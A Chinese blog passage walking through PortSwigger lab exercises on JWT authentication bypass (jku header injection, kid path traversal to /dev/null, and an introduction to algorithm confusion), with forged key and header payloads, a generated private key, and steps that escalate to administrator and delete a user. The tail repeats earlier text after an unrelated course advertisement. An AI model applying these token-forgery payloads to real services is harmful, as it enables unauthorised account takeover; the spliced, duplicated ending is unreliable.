Step 1:首先点击上方的"ACCESS THE LAB"选项卡进入实验环境


![](https://img-blog.csdnimg.cn/img_convert/b9d3c587521fde1e66e60b0387d371a7.png)


Step 2:登录系统



wiener:peter


![](https://img-blog.csdnimg.cn/img_convert/4271dae663a7232c429b868dd90d5fd6.png)


Step 3:随后你会看到一个用户邮箱更新的表单


![](https://img-blog.csdnimg.cn/img_convert/5e9be6706a3806306d4f402e2d4b37ce.png)


Step 4:使用burpsuite生成一个新的RSA密钥



{
“p”: “8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU”,
“kty”: “RSA”,
“q”: “1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8”,
“d”: “Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ”,
“e”: “AQAB”,
“kid”: “fa018615-0392-4d15-89bb-a2c637d9adbd”,
“qi”: “XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks”,
“dp”: “0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0”,
“dq”: “QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M”,
“n”: “ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w”
}


![](https://img-blog.csdnimg.cn/img_convert/e4e6539bcffe997005975ada518b73de.png)


Step 5:发送请求到repeat


![](https://img-blog.csdnimg.cn/img_convert/c687d1d8fff39166f7e27eb85c254715.png)


Step 6:复制公钥作为JWK



{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “fa018615-0392-4d15-89bb-a2c637d9adbd”,
“n”: “ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w”
}


![](https://img-blog.csdnimg.cn/img_convert/2a6754a8ec6f5aef4f5c09b41e3bf919.png)


Step 7:在题目中选择"Go eo exploit server",然后加上key头并保存到exploit的body中



{
“keys”: [
{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “fa018615-0392-4d15-89bb-a2c637d9adbd”,
“n”: “ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w”
}
]
}


![](https://img-blog.csdnimg.cn/img_convert/6740888c963d78ef0de840aaad5f460b.png)


![](https://img-blog.csdnimg.cn/img_convert/35d1a765dbf1f02b955cc953b66b23a3.png)


Step 8:然后切换至repeat的"JSON Web Token"界面,将kid修改成自己生成的JWK中的kid值,将jku的值改为exploit


![](https://img-blog.csdnimg.cn/img_convert/49558e6b4830255c6bbcfa2472dd7bf1.png)


![](https://img-blog.csdnimg.cn/img_convert/2ef263265242248af18e643fff76cb05.png)


Step 9:切换sub为administrator


![](https://img-blog.csdnimg.cn/img_convert/d1bb4bce1d0f9076a4e234159b6db90d.png)


Step 10:点击下面的sign,选择Don’t modify header模式


![](https://img-blog.csdnimg.cn/img_convert/ad2c92523a7944f59cc0494f296dda92.png)


Step 11:更改请求路径发送请求成功越权


![](https://img-blog.csdnimg.cn/img_convert/cb6023e9d486a856f849322b98dcf5b3.png)


Step 12:请求敏感路径删除carlos用户


![](https://img-blog.csdnimg.cn/img_convert/58ea518dfe92ce075f818cfe18672ea5.png)


Step 13:成功解题


![](https://img-blog.csdnimg.cn/img_convert/5b31ac1b861f274d3fd3eb24f2e62955.png)


###### # 注入场景3


服务器可能使用几个密钥来签署不同种类的数据,因此JWT的报头可能包含kid(密钥id)参数,这有助于服务器在验证签名时确定使用哪个密钥,验证密钥通常存储为一个JWK集,在这种情况下服务器可以简单地查找与令牌具有相同kid的JWK,然而JWS规范没有为这个ID定义具体的结构——它只是开发人员选择的任意字符串,例如:它们可能使用kid参数指向数据库中的特定条目,甚至是文件的名称,如果这个参数也容易受到目录遍历的攻击,攻击者可能会迫使服务器使用其文件系统中的任意文件作为验证密钥,例如:



{
“kid”: “…/…/path/to/file”,
“typ”: “JWT”,
“alg”: “HS256”,
“k”: “asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc”
}


如果服务器也支持使用对称算法签名的jwt就会特别危险,在这种情况下攻击者可能会将kid参数指向一个可预测的静态文件,然后使用与该文件内容匹配的秘密对JWT进行签名,从理论上讲您可以对任何文件这样做,但是最简单的方法之一是使用/dev/null,这在大多数Linux系统上都存在,由于这是一个空文件,读取它将返回一个空字符串,因此用空字符串对令牌进行签名将会产生有效的签名  
 靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal


![](https://img-blog.csdnimg.cn/img_convert/b63244856d08dc9f28606ae3e7fd5f9a.png)


Step 1:点击上方"Access The Lab"进入靶场


![](https://img-blog.csdnimg.cn/img_convert/0849b3938ae5fccc4f8f0fe4e7213136.png)


Step 2:登录靶场


![](https://img-blog.csdnimg.cn/img_convert/9c0891ffd4505f33148beb13489e2b5d.png)


Step 3:登录后进入到如下邮箱更新界面


![](https://img-blog.csdnimg.cn/img_convert/c360ac6567632b3a90c189cb463b7ed2.png)


Step 4:使用burpsuite的插件生成一个对称密钥(Symmetric Key)并将k的值修改为"AA=="即为null



{
“kty”: “oct”,
“kid”: “38576880-33b7-4446-ade4-f1a78bb6d5c2”,
“k”: “AA==”
}


![](https://img-blog.csdnimg.cn/img_convert/1472d149ee43c54411b8512317f8e53c.png)


Step 5:拦截一个请求将其发送到repeat模块


![](https://img-blog.csdnimg.cn/img_convert/36a65a0afa5278bc203056a3f11ab1bb.png)


Step 6:此时直接访问/admin——提示"401 Unauthorized"


![](https://img-blog.csdnimg.cn/img_convert/9fb259a81591f016c414dff607da4bcd.png)


Step 7:在JSON Web Token界面中修改kid值和sub进行目录遍历,这里的"/dev/null"文件名与"AA=="一致都为null,对称密钥,所以可以成功绕过



{
“kid”: “…/…/…/…/…/…/…/dev/null”,
“alg”: “HS256”
}


![](https://img-blog.csdnimg.cn/img_convert/933df62718f8feb9975e11668f5eab1a.png)


Step 8:点击sign选择OCT8 的密钥攻击


![](https://img-blog.csdnimg.cn/img_convert/707db2c05a34a1d637d7ec6145696faf.png)


![](https://img-blog.csdnimg.cn/img_convert/bd39258fde9e62b97c7425b57df7b93b.png)


Step 9:成功越权


![](https://img-blog.csdnimg.cn/img_convert/a999190c0c1d685c8d1ef40ebee3e9a3.png)


Step 10:调用敏感接口删除carlos用户完成解题


![](https://img-blog.csdnimg.cn/img_convert/98857c2a974565c5715faf98a5718fff.png)


![](https://img-blog.csdnimg.cn/img_convert/07cc37d2682ece67cc051572b0d2f023.png)


###### JWT算法混淆


###### 算法混淆


算法混淆攻击(也称为密钥混淆攻击)是指攻击者能够迫使服务器使用不同于网站开发人员预期的算法来验证JSON web令牌(JWT)的签名,这种情况如果处理不当,攻击者可能会伪造包含任意值的有效jwt而无需知道服务器的秘密签名密钥  
 JWT可以使用一系列不同的算法进行签名,其中一些,例如:HS256(HMAC+SHA-256)使用"对称"密钥,这意味着服务器使用单个密钥对令牌进行签名和验证,显然这需要像密码一样保密


![](https://img-blog.csdnimg.cn/img_convert/97d9c5913ef7b517e38021f0d89dab70.png)


其他算法,例如:RS256(RSA+SHA-256)使用"非对称"密钥对,它由一个私钥和一个数学上相关的公钥组成,私钥用于服务器对令牌进行签名,公钥可用于验证签名,顾名思义,私钥必须保密,但公钥通常是共享的,这样任何人都可以验证服务器发出的令牌的签名


![](https://img-blog.csdnimg.cn/img_convert/72b561bd79078e6c67c624f17d449bf9.png)


###### 混淆攻击


算法混乱漏洞通常是由于JWT库的实现存在缺陷而导致的,尽管实际的验证过程因所使用的算法而异,但许多库都提供了一种与算法无关的方法来验证签名,这些方法依赖于令牌头中的alg参数来确定它们应该执行的验证类型,下面的伪代码显示了一个简单的示例,说明了这个泛型verify()方法在JWT库中的声明:



function verify(token, secretOrPublicKey){
algorithm = token.getAlgHeader();
if(algorithm == “RS256”){
// Use the provided key as an RSA public key
} else if (algorithm == “HS256”){
// Use the provided key as an HMAC secret key
}
}


使用这种方法的网站开发人员认为它将专门处理使用RS256这样的非对称算法签名的JWT时,问题就出现了,由于这个有缺陷的假设他们可能总是传递一个固定的公钥给方法,如下所示:



publicKey = <public-key-of-server>;
token = request.getCookie(“session”);
verify(token, publicKey);


在这种情况下如果服务器接收到使用对称算法(例如:HS256)签名的令牌,库通用verify()方法会将公钥视为HMAC密钥,这意味着攻击者可以使用HS256和公钥对令牌进行签名,而服务器将使用相同的公钥来验证签名(备注:用于签署令牌的公钥必须与存储在服务器上的公钥完全相同,这包括使用相同的格式(如X.509 PEM)并保留任何非打印字符,例如:换行符,在实践中您可能需要尝试不同的格式才能使这种攻击奏效)  
 攻击流程简易视图如下:


![](https://i-blog.csdnimg.cn/blog_migrate/e09ebd4e1f04f35ae48d5f0bfcbcdd3a.png)


###### 攻击演示


靶场地址:https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion


![](https://i-blog.csdnimg.cn/blog_migrate/5ed3a58c7923b86ca229240f740ef855.png)




**深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

![](https://i-blog.csdnimg.cn/blog_migrate/1e210328c1ebf43f08d3b6c5f5c13b48.png)
![img](https://img-blog.csdnimg.cn/img_convert/1bb72a33c0881875686a38c30cc2b11c.png)
![img](https://img-blog.csdnimg.cn/img_convert/e9db5e38fcbdf9e94b66501f0a5ce736.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上鸿蒙开发知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/topics/618636735)**

ey as an HMAC secret key  
    }  
}  


使用这种方法的网站开发人员认为它将专门处理使用RS256这样的非对称算法签名的JWT时,问题就出现了,由于这个有缺陷的假设他们可能总是传递一个固定的公钥给方法,如下所示:

publicKey \= <public\-key\-of\-server\>;  
token \= request.getCookie("session");  
verify(token, publicKey);  


在这种情况下如果服务器接收到使用对称算法(例如:HS256)签名的令牌,库通用verify()方法会将公钥视为HMAC密钥,这意味着攻击者可以使用HS256和公钥对令牌进行签名,而服务器将使用相同的公钥来验证签名(备注:用于签署令牌的公钥必须与存储在服务器上的公钥完全相同,这包括使用相同的格式(如X.509 PEM)并保留任何非打印字符,例如:换行符,在实践中您可能需要尝试不同的格式才能使这种攻击奏效)
攻击流程简易视图如下:

攻击演示

靶场地址:https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!


[外链图片转存中…(img-3zrJjWFK-1715615443613)]
[外链图片转存中…(img-OTNcRmCw-1715615443614)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上鸿蒙开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值